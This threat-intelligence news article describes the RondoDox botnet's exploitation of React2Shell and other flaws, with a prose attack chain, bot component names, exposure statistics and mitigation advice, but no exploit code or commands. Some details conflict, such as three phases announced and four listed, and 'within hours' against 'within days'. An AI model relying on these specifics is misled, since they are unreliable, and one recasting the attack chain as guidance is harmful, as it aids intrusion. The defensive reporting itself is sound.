Cyberwarzone

RondoDox Botnet Exploits React2Shell CVSS 10.0 to Hijack 90,300+ IoT Devices and Web Servers

by

Peter Chofield
in
Summarize with:



What happens when a critical remote code execution vulnerability in a widely-used web framework gets exploited by a sophisticated botnet operator to hijack thousands of IoT devices and web servers? RondoDox gives you the answer. This nine-month campaign, targeting Internet of Things devices and web applications worldwide, has escalated dramatically since discovering React2Shell (CVE-2025-55182)—a CVSS 10.0 flaw in React Server Components and Next.js. As of December 2025, over 90,300 instances remain vulnerable globally, with 68,400 in the United States alone. RondoDox doesn’t just compromise a single device; it systematically enrolls victims into a botnet infrastructure designed to resist displacement, competing malware cleanup, and forensic recovery. The campaign demonstrates how a determined threat actor leveraging multiple zero-days and recently-disclosed critical flaws can scale attacks across heterogeneous infrastructure—from internet-facing React applications to obscure IoT routers to cloud-native deployments.

React2Shell Vulnerability (CVE-2025-55182): React2Shell is a critical remote code execution flaw affecting React Server Components (RSC) and Next.js frameworks. The vulnerability allows unauthenticated attackers to achieve arbitrary code execution on susceptible web servers. With a CVSS score of 10.0 and no authentication required, the attack surface is massive. Vulnerable instances span multiple versions and deployment configurations, and many organizations have not yet applied patches.

RondoDox Campaign Timeline & Evolution: The RondoDox botnet emerged in early 2025 but has undergone continuous expansion and tactical evolution. The campaign has three documented phases:

  • Phase 1 (March–April 2025): Initial reconnaissance and manual vulnerability scanning of target infrastructure. Threat actors conducted environment discovery to identify high-value targets.
  • Phase 2 (April–June 2025): Daily mass vulnerability probing of web applications (WordPress, Drupal, Apache Struts2) and IoT devices (Wavlink routers, generic Linux-based network appliances). Attackers automated enumeration to build a comprehensive list of exploitable targets.
  • Phase 3 (July–Early December 2025): Hourly automated large-scale deployment of bot payloads. The infrastructure was fully operational, with minimal human intervention required. Attackers achieved near-continuous scanning and infection.
  • Phase 4 (December 2025–Present): Integration of React2Shell as a primary initial access vector. Upon discovery of CVE-2025-55182, RondoDox operators rapidly weaponized the flaw, shifting focus to Next.js servers as high-priority targets. This phase demonstrates adaptive threat actor behavior—exploiting the newest critical vulnerabilities within days of disclosure.

Exploited Vulnerabilities Beyond React2Shell: RondoDox is not a one-trick operator. The campaign has leveraged multiple vulnerabilities across 2025:

  • CVE-2023-1389: A legacy vulnerability that RondoDox continues to exploit, indicating widespread unpatched infrastructure.
  • CVE-2025-24893: An XWiki vulnerability exploited in mass campaigns targeting knowledge management systems.
  • WordPress, Drupal, Struts2 flaws: Common web application vulnerabilities that remain prevalent in production environments.

This multi-vulnerability approach increases the likelihood of successful infection across diverse target environments. If one vulnerability is patched, attackers pivot to others.

RondoDox’s operational success stems from three critical factors: scale, sophistication, and persistence. A single compromised Next.js server or IoT device may seem insignificant. But RondoDox doesn’t operate on individual targets—it operates on networks. Tens of thousands of infected devices become a distributed computation resource for cryptocurrency mining, botnet relay infrastructure, and reconnaissance platforms for downstream attacks.

The botnet’s most dangerous feature is its anti-forensics capability. The “/nuts/bolts” component systematically terminates competing malware, removes rival cryptocurrency miners, clears artifacts from prior campaigns, and eliminates associated cron jobs before installing RondoDox persistence. This “cleanup” behavior serves two purposes: (1) it prevents resource contention (rival botnets consuming CPU/memory), and (2) it obscures the attack history, complicating incident response and attribution.

For organizations operating IoT infrastructure, the risk is severe. Unpatched Wavlink routers and similar devices often run minimal logging. A compromise may persist for months before detection. For web application operators running WordPress, Drupal, or—increasingly—Next.js, a single vulnerability can expose the entire web tier. React2Shell’s CVSS 10.0 rating reflects the severity: no authentication, no user interaction, complete system compromise possible.

The geographic concentration of vulnerable instances amplifies risk. With 68,400 of 90,300 vulnerable instances in the United States, American infrastructure is disproportionately exposed. This includes government agencies, educational institutions, healthcare systems, and private enterprises running internet-facing Next.js applications without patches.

The campaign’s persistence mechanism ensures long-term access even after initial detection. Once installed, RondoDox uses “/etc/crontab” and process whitelisting to survive reboot cycles and resist manual removal. The bot continuously scans /proc (process information) every ~45 seconds, killing non-whitelisted processes. This means even if a system administrator attempts to terminate the botnet process, it reinstalls itself automatically.

Economic impact is substantial but often invisible. Compromised devices burn electricity and bandwidth mining cryptocurrency or relaying traffic. Cloud environments experience unexpected egress charges. Victim organizations may not realize their infrastructure is compromised until they audit resource consumption or incident responders discover infection during unrelated investigations.

Attack Mechanics – Step by Step:

1. Reconnaissance & Target Identification: RondoDox operators scan the internet using Shodan, Censys, Censys, or custom scanning infrastructure to identify Next.js servers, WordPress installations, Drupal sites, Apache Struts2 endpoints, and Wavlink routers. They fingerprint services by observing HTTP headers, response patterns, and deployment artifacts. The automated scanning continuously updates a database of exploitable targets.

2. Vulnerability Exploitation: For React2Shell, the attack begins by sending a specially crafted HTTP request to a vulnerable Next.js server. The request exploits the RSC deserialization flaw, achieving unauthenticated remote code execution. The attacker’s payload is embedded in the HTTP body or parameters. No authentication is required; no user interaction is necessary.

3. Payload Staging: The initial RCE payload is minimal—a shell script or Python one-liner that downloads the bot binary from an attacker-controlled C2 server. This reduces detection surface: instead of delivering a 1 MB binary in the initial exploit, attackers fetch it after code execution is confirmed.

4. Botnet Loader Execution: The “/nuts/bolts” component is fetched and executed. This loader performs critical housekeeping:

  • Terminates competing malware (other botnets, cryptominers, worms)
  • Removes artifacts from prior campaigns (cron jobs, persistence scripts)
  • Clears Docker containers and orphaned processes
  • Establishes persistence via /etc/crontab and systemd services
  • Begins continuous process monitoring, killing non-whitelisted processes every ~45 seconds

5. Main Bot Installation & C2 Communication: After cleanup, the main RondoDox bot binary (“/nuts/x86” for x86 architecture, with ARM variants available) is downloaded and executed. The bot establishes encrypted communication with the command-and-control server, reporting system information (CPU, RAM, network connectivity, detected security software).

6. Payload Deployment: Based on C2 instructions, the infected device runs:

  • Cryptocurrency Miners: The “/nuts/poop” component begins mining cryptocurrency (typically Monero), consuming CPU resources. Victims experience performance degradation, increased power bills, and potential overheating.
  • Botnet Relay: The device becomes part of a distributed botnet mesh, relaying traffic and participating in DDoS campaigns, spam distribution, or unauthorized scanning.
  • Reconnaissance Payload: The bot can receive commands to launch further reconnaissance against the victim’s internal network, lateral movement scanning, or targeted exploitation.

Detection & Mitigation (Immediate):

  • Patch React2Shell: Update Next.js to a patched version immediately. Check all Next.js deployments, especially production instances.
  • Patch Legacy Vulnerabilities: Apply patches for CVE-2023-1389, CVE-2025-24893, and WordPress/Drupal plugins. Prioritize internet-facing applications.
  • IoT Device Inventory & Patching: Enumerate all Wavlink routers and similar IoT devices. Update firmware to patched versions. For devices with no patch available, isolate them to dedicated VLANs.
  • Network Segmentation: Place IoT devices on isolated network segments (VLANs) with restricted egress. Use firewall rules to permit only necessary traffic (e.g., NTP for time sync, DNS for name resolution).
  • Web Application Firewalls (WAF): Deploy WAF rules to detect React2Shell exploitation attempts. Block suspicious POST/PUT requests to Next.js endpoints with abnormal payloads.
  • Process Monitoring & Behavioral Detection: Monitor for suspicious process execution patterns (e.g., shell processes spawning from web server processes, cron job modifications, /etc/crontab changes). Alert on execution of unknown binaries in /tmp or /var/tmp.
  • C2 Sinkholing & Blocking: Block known RondoDox C2 IPs and domains at the firewall level. Subscribe to threat intelligence feeds for updated IOCs.
  • Forensic Artifact Hunting: On suspected compromised systems, look for:
    • /etc/crontab entries with unusual timing or commands
    • /proc/sys/net/ipv4/ip_forward modifications (indicating relay behavior)
    • Unusual network listener ports (botnet C2 communication)
    • Modified systemd service files
    • Unusual /tmp or /var/tmp binary files
    • High CPU consumption by unfamiliar processes

RondoDox represents a convergence of historical botnet patterns with modern attack infrastructure. Botnets have existed since the early 2000s—Mirai, Botnet.B, Conficker—but RondoDox incorporates lessons from all prior generations. The botnet’s multi-vulnerability approach mirrors the operational strategy of sophisticated threat groups like Lazarus and APT1: maximize target coverage by exploiting every available vulnerability.

The adoption of React2Shell within hours of its public disclosure (December 2025) demonstrates threat actor monitoring of disclosure channels. Attackers subscribe to CISA advisories, threat intelligence feeds, and security news outlets. When a critical vulnerability is announced, weaponization follows within days. This rapid exploitation window has become a standard threat actor tactic.

RondoDox’s anti-forensics capabilities—the cleanup behavior of “/nuts/bolts”—indicate an operator focused on persistence over aggression. Unlike worms that propagate indiscriminately and crash systems, RondoDox seeks to remain undetected for months or years. The continuous process monitoring and non-whitelisted process termination suggest an attacker who has observed detection in prior campaigns and adapted.

The geographic exposure skew (68,400 of 90,300 vulnerable instances in the U.S.) may reflect attacker targeting preferences or simply the distribution of Next.js deployments. Either way, American infrastructure bears disproportionate risk. Government contractors, DoD suppliers, and critical infrastructure operators running unpatched Next.js applications are high-priority targets for espionage, sabotage, or supply chain compromise.

Cryptocurrency mining as a primary payload choice reflects economic rationality. Botnets that mine Monero (a privacy-focused cryptocurrency) are converting computational power directly into financial gain. Unlike ransomware (which requires negotiation and risks law enforcement attention) or wiper malware (which has limited monetization), mining is silent, scalable, and generates continuous revenue with minimal operational overhead.

The timing and scale of the campaign—hourly deployment at large scale—indicates operational maturity and resource investment. This is not a small group running scripts from home laptops. This is infrastructure—scanning servers, C2 nodes, payload hosting, cryptocurrency wallet infrastructure, operational security practices. The threat actor has invested significant resources and intends long-term operation.

Primary Technical Analysis & Reporting:

Vulnerable Infrastructure Statistics (December 31, 2025 – Shadowserver Data):

  • Global: 90,300+ vulnerable instances
  • United States: 68,400
  • Germany: 4,300
  • France: 2,800
  • India: 1,500
  • Other: ~13,400 (distributed across remaining countries)

Affected Technologies:

  • React Server Components (RSC)
  • Next.js (all vulnerable versions pre-patch)
  • WordPress (with vulnerable plugins)
  • Drupal (with vulnerable modules)
  • Apache Struts2
  • Wavlink routers and similar IoT appliances

RondoDox Bot Components:

  • /nuts/poop: Cryptocurrency miner (Monero)
  • /nuts/bolts: Botnet loader, persistence installer, process monitor, rival malware terminator
  • /nuts/x86: Main bot binary for x86 architecture (with ARM variants available)
  • C2 Communication: Encrypted, utilizing multiple fallback channels

Attack Lifecycle Timeline:

  • March 2025: Initial reconnaissance begins
  • April–June 2025: Mass vulnerability scanning and enumeration
  • July–December 2025: Automated large-scale deployment
  • December 2025: React2Shell integrated as primary initial access vector
  • January 2026: Campaign continues with hourly deployment across 90,300+ instances

Detection & Indicator of Compromise (IOC) Resources: Organizations should query Shadowserver’s live dashboard to determine exposure, subscribe to CISA KEV catalog updates for newly weaponized vulnerabilities, and monitor threat intelligence feeds (Darktrace, CloudSEK, Kaspersky) for updated RondoDox C2 infrastructure and payload hashes. The botnet’s rapid iteration and multi-vulnerability approach demand continuous monitoring.